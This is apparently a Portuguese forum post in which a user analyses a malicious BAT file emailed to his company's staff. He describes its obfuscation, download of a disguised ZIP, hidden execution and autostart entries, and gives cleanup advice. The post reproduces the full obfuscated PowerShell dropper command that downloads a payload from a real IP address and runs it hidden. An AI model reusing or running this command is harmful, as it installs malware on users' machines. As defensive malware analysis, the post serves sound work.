Diego Junges

Boa tarde.
 
Aqui na nossa empresa chegou também por e-mail a vários colaboradores um BAT muito parecido com esse que o colega publicou.
Depois de analisar, entendi mais ou menos o que ele faz:
 
Primeiro ele define um monte de variáveis para ofuscar os comandos.
Depois ele baixa um arquivo do caminho 15.188.238.189/meupau.torrent (que no momento já não está mais disponível, mas no e-mail que veio para nossa empresa o caminho é http://18.231.164.255/lancamento2021.torrent)
Está com extensão torrent, mas é um ZIP.
Em seguida o bat manda descompactar e executar o instalador (bin.exe) usando o powershell em modo oculto.
Tudo isso ocorre na pasta %ProgramData%\NAV-Software_-[CHAVE-CRIPTOGRAFADA]\ (ou Software-Maker[CHAVE-CRIPTOGRAFADA])
Você pode excluir essa pasta se ela estiver presente no sistema.
Notei também que são adicionadas duas entradas para iniciar automaticamente junto com o Windows (verificar msconfig.exe)
Eu só não consegui descobrir o que a aplicação instalada faz.
 
Mas o comando que executa tudo no final do bat é o seguinte:
%SystemRoot%\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command  "& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.188.238.189/meupau.torrent' 'NAV-Software_-[CHAVE-CRIPTOGRAFADA].zip';!GOFDSJCM_GO! -s 5 ;$shell = !EXOYZB_GO!-object -com !IBGIZ_GO!;$zip = $shell.!LSZMSPI_GO!('NAV-Software_-[CHAVE-CRIPTOGRAFADA].zip');foreach($item in $zip.items()){$shell.!LSZMSPI_GO!('NAV-Software_-[CHAVE-CRIPTOGRAFADA]').copyhere($item);};!GOFDSJCM_GO! -s 5 ;renam!PRAXCMJT_GO! -path ('NAV-Software_-[CHAVE-CRIPTOGRAFADA]\bin.~tmp') -!EXOYZB_GO!name ('NAV-Software_-[CHAVE-CRIPTOGRAFADA].~tmp');renam!PRAXCMJT_GO! -path ('NAV-Software_-[CHAVE-CRIPTOGRAFADA]\bin!XPDHZPAZJD_GO!') -!EXOYZB_GO!name ('NAV-Software_-[CHAVE-CRIPTOGRAFADA]!XPDHZPAZJD_GO!');remov!PRAXCMJT_GO! 'NAV-Software_-[CHAVE-CRIPTOGRAFADA].zip';!GOFDSJCM_GO! -s 5 ;!NEYRZOVD_GO! ('NAV-Software_-[CHAVE-CRIPTOGRAFADA]\NAV-Software_-[CHAVE-CRIPTOGRAFADA]!XPDHZPAZJD_GO!')}"